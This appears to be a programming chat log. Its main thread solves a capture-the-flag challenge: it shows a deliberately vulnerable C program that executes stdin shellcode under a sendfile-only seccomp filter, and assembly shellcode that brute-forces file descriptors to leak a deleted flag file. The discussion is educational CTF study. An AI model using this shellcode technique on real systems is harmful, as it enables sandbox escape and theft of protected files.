I dont get this.../proc will have have fd entry of this process ..Right?
Yes but how will she read the proc file? She cant execute any system calls other than sendfile. After reading through her code again (I missed the read system call during my first read) and after clarification from @Mysticial, I understood that the shell code has to be injected in through stdin into the newly mapped memory page. So she just has to make a fileno call to get the file descriptor associated with the FILE* stream pointer and then make a sendfile system call to print the output to stdout.
Anonymous
Anonymous
I dont get this.../proc will have have fd entry of this process ..Right?
And as far as your question is concerned, I said the file descriptors that you use in your code are per process only. So if this exploit has to be done through another process then the file descriptors wont be of much help. Which is why I suggested reading the system wide file descriptor table instead.
But after @Mysticial clarified things, I realized that this is not what the instructor was expecting.
z
BTW, this is how fileno defined in glibc.
#define _IO_fileno(FP) ((FP)->_fileno)
int __fileno (FILE *fp)
{
CHECK_FILE (fp, EOF);
if (!(fp->_flags & _IO_IS_FILEBUF) || _IO_fileno (fp) < 0)
{
__set_errno (EBADF);
return -1;
}
return _IO_fileno (fp);
}
Ref: https://sourceware.org/pipermail/glibc-cvs/2017q4/064339.html
Ref: https://code.woboq.org/userspace/glibc/libio/fileno.c.html
z
So basically from
FILE *fptr = fopen(blah...);
We can take the file descriptor with fptr->_fileno.
z
Now you need to find the offset of _fileno in struct FILE, so you can mov esi, [mem_addr + offset] before syscall.
z
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <seccomp.h>
#include <sys/mman.h>
#include <limits.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
void setup_seccomp() {
scmp_filter_ctx ctx;
ctx = seccomp_init(SCMP_ACT_KILL);
int ret = 0;
ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(sendfile), 0);
ret |= seccomp_load(ctx);
if (ret) {
exit(1);
}
}
typedef void (*void_fn)(void);
int main(void) {
setbuf(stdout, NULL);
FILE * fptr = fopen("flag.txt","r");
puts("Goodbye flag!");
int ret = remove("flag.txt");
if (ret == 0) {
puts("Flag file successfully removed.");
} else {
puts("Error removing flag file");
exit(-1);
}
puts("What do you have to say about us so carelessly removing your precious flag?");
void * buf = mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
void_fn sc = (void_fn) buf;
ssize_t num_read = read(0, buf, 100);
setup_seccomp();
sc();
return 0;
}
And I believe, if there is no inherited file descriptor, the fIle descriptor corresponds to opened file flag.txt will be 3.
0 for stdin
1 for stdout
2 for stderr
If you open one more fd, that will be 3. For sure.
™barynium†⋆。˚🇧🇷
Hi!
I need a little theory on what is bool type and when to use it 🙏
RC
Anyone knows how to use goto in c?
Alfredo
RC
https://lmddgtfy.net/?q=goto%20statement%20in%20c
Thanks, I did it but Idk what's wrong with my code
RC
#include <stdio.h>
int main()
{
char s;
menu: printf("Write sth\n");
scanf("%c",&s);
if(s==0){
goto p;
}
switch (s)
{
case 'd':
printf("yh");
break;
case 'h':
printf("right");break;
}
goto menu;
p:
return 0;
}
VR
#include<iostream>
using namespace std;
struct student{
char name[100];
int sub1marks;
int sub2marks;
};
int main(){
int n;
cin>>n;
student *s1 = new student[n];
for(int i=0;i<n;i++){
cin.getline(s1[i].name,100);
cin>>s1[i].sub1marks;
cin>>s1[i].sub2marks;
}
for(int i=0;i<n;i++){
cout<<s1[i].name<<" "<<s1[i].sub1marks<<" "<<s1[i].sub2marks<<endl;
}
return 0;
}
VR
This programme is taking only one input also I give n as 3
VR
Can any one please tell
Anonymous
Hey can any one tell how the below equation work
Float area, a, b, h;
area = 1/2 * (a+b) * h;
This gives the result 0.00
Whereas this gives correct answer
area = 1.0/2.0 *(a+b) * h;
Anonymous
Why
Anonymous
C
Anonymous
Use area=(float)
Anonymous
Put the equation in bracket
Suka
Why
because 1 and 2 (first number) is integer constant. compiler treated it as integer calculation.
try use this.
area = (a+b)*h*1/2;
cmiiw.
Anonymous
And I believe, if there is no inherited file descriptor, the fIle descriptor corresponds to opened file flag.txt will be 3.
0 for stdin
1 for stdout
2 for stderr
If you open one more fd, that will be 3. For sure.
I have another question. How can we know where fptr be? It's not the argument of function sc. And we also don't know where fptr be in memory/register.
Anonymous
Anonymous
Am a newbie so sorry
Anonymous
z
I have another question. How can we know where fptr be? It's not the argument of function sc. And we also don't know where fptr be in memory/register.
Exactly. That's a bit tricky, but I can guarantee you can find it on the stack if the source code is compiled with -O0 optimization (no optimization).
_However_, if it is compiled with optimization enabled, we don't know exactly where fptr is, it may not even be in register anymore. We don't have the reference, even though it still lives somewhere on the heap (we can't reach it).
The most rational way is to brute force the file descriptor, although I believe it will be 3. In special case where it has inherited file descriptors, it may not be 3 anymore.
So you can do this:
for (int = 3; i < 1000; i++) {
sendfile(1, i, NULL, 32);
}
sendfile will return EBADF if the file descriptor is wrong, but we don't care, keep trying until we find a valid fd and something will show up on stdout.
z
movl $3, %ebp
my_loop:
movl $40, %eax # sendfile syscall
movl $1, %edi # arg1=stdout
movl %ebp, %esi # arg2=might be fptr->_fileno
xorl %edx, %edx # arg3=NULL
movl $32, %r10d # arg4=32
syscall
incl %ebp
cmpl $1000, %ebp
jl my_loop
# Oops, we can't have exit syscall due to seccomp.
# Let's make it fault!
movq 0, %rax # NULL dereference
z
Untested, but the idea should be clear enough.
Anonymous
For a change, some question here finally sparked an interesting discussion and I learnt a lot. Thanks @Mysticial
z
For a change, some question here finally sparked an interesting discussion and I learnt a lot. Thanks @Mysticial
Yeah, it was an interesting discussion for me as well. Thanks.
Anshul
When I watch videos on c++ programming
Sometimes the programmer puts a semicolon after a function and sometime he doesn't.
Why is it so?
Ravi
When I watch videos on c++ programming
Sometimes the programmer puts a semicolon after a function and sometime he doesn't.
Why is it so?
putting any extra semicolun doesnt make any error in cpp, or it would be lambda function,.that requires semicolun
Anonymous
When I watch videos on c++ programming
Sometimes the programmer puts a semicolon after a function and sometime he doesn't.
Why is it so?
If you put a semicolon after a function definition it is harmless. It will be just considered a null statement.
Ravi
Ravi
putting any extra semicolun doesnt make any error in cpp, or it would be lambda function,.that requires semicolun
Also at the time of defination of the function, when body is below the main function, you should put the semicolun
Anonymous
Anonymous
Anshul
its called function declaration
No I didn't mean that.
See this
int fun(....)
{
Put some code....
};
Anonymous
No I didn't mean that.
See this
int fun(....)
{
Put some code....
};
This semicolon is harmless. You dont need it there but.
Anonymous
Also it is optional.
It is not optional. It is not required. If you put it there it will be considered a null statement like I said earlier.
Ravi
It is not optional. It is not required. If you put it there it will be considered a null statement like I said earlier.
But he has putt after body, so it is not null for this case naaa. 🤔
Anonymous
But he has putt after body, so it is not null for this case naaa. 🤔
The function definition ends with the brace. It can be followed by another statement. If you add a semicolon it is considered a null statement that follows the function definition
Anshul
It is not optional. It is not required. If you put it there it will be considered a null statement like I said earlier.
It doesn't get considered as null
It works fine.
Like if it was considered as null, in that case there should be UB when I calling the function, right?
Anonymous
It doesn't get considered as null
It works fine.
Like if it was considered as null, in that case there should be UB when I calling the function, right?
I said null statement. It means empty statement
Nils
As in it generates no assembly instructions
Nils
Well some compilers generate NOP instructions instead, but modern ones don't
Anonymous
As in it generates no assembly instructions
Not true. There are so many statements in your code which may not generate assembly instructions. Not all of them are null statements.
Nils
Not true. There are so many statements in your code which may not generate assembly instructions. Not all of them are null statements.
null statement means it generates no assembly, but generating no assembly does not mean null statement
Anonymous
Well some compilers generate NOP instructions instead, but modern ones don't
NOP instructions are inserted mostly for pipe lining in modern processors.
Anonymous
null statement means it generates no assembly, but generating no assembly does not mean null statement
We are trying to define null statement here. So you cant use "non generation of assembly instructions" as a definition.
The actual definition according to the standard is this : "a null statement is an expression statement without any expression"
Bhlar
Hello
@𝑺𝒐𝒃𝒌𝒂
/report
Shourya
For a change, some question here finally sparked an interesting discussion and I learnt a lot. Thanks @Mysticial
For me as well ...After ur explanation only I got the complete question ...I thought he wants shell script instead of shellcode😂
professor
how do I write an out of bounds read in c++?
Anonymous
movl $3, %ebp
my_loop:
movl $40, %eax # sendfile syscall
movl $1, %edi # arg1=stdout
movl %ebp, %esi # arg2=might be fptr->_fileno
xorl %edx, %edx # arg3=NULL
movl $32, %r10d # arg4=32
syscall
incl %ebp
cmpl $1000, %ebp
jl my_loop
# Oops, we can't have exit syscall due to seccomp.
# Let's make it fault!
movq 0, %rax # NULL dereference
sendfile can't write to stdin/stdout/stderr since they are opened with O_APPEND flag.
The out_fd with O_APPEND flag is not currently supported by sendfile(). (Linux 5.11 man page)
Can we change their flag or reopen them or open a new file with only sendfile syscall? Or seccomp implicitly allow some call?
z
sendfile can't write to stdin/stdout/stderr since they are opened with O_APPEND flag.
The out_fd with O_APPEND flag is not currently supported by sendfile(). (Linux 5.11 man page)
Can we change their flag or reopen them or open a new file with only sendfile syscall? Or seccomp implicitly allow some call?
We can't.
- We can't change the flag because changing the flags requires fcntl syscall.
- We can't open a new file because it requires open syscall.
But if you notice in some CTF, the fd 0 and 1 may not be stdin and stdout anymore. Usually they are redirected to a file or a socket. So we supply our payload through nc <host> <port> or something like web interface. In that case, fd 1 doesn't have O_APPEND flag.
It is like when you redirect something on bash:
./prog1 > output
./prog2 < input
z
Yap, I tested it. We can't write to stdout with sendfile. But if we redirect the output to a file, it works.
https://pastebin.com/raw/A3RTaZis
z
echo "This is the flag" > flag.txt
gcc test.c -o test -lseccomp
./test > out
cat out
z
I examined the return value with strace, and found sendfile returns EINVAL if the out_fd is stdout.
Anonymous
I examined the return value with strace, and found sendfile returns EINVAL if the out_fd is stdout.
Yes, just verified. In bash/zsh, redirect stdout to a file makes its flag to be O_WRONLY | O_LARGEFILE.
Thanks for your response. I learned a lot.
Anonymous
Hello
I'm from a non CS/IT field, interested to learn coding and looking forward to build a career in the IT field.
I've started with c language.
Since I'm an absolute beginner, I'd highly appreciate any suggestions/advice on how I should approach learning and practicing c language, as well as improving my cv/resume (and other requirements in any, like some programming languages or tools that I need to learn) so as to become employable in the IT sector.
Thank you
~Maverick
Hello
I'm from a non CS/IT field, interested to learn coding and looking forward to build a career in the IT field.
I've started with c language.
Since I'm an absolute beginner, I'd highly appreciate any suggestions/advice on how I should approach learning and practicing c language, as well as improving my cv/resume (and other requirements in any, like some programming languages or tools that I need to learn) so as to become employable in the IT sector.
Thank you
The first thing you can do is to see different types of data type and how they works.
What are header files
How we print a line
How we print a new line
These are the basics
z
/report
Anunay
Can you not...!?
Anunay
Don't click/tap every blue thing you see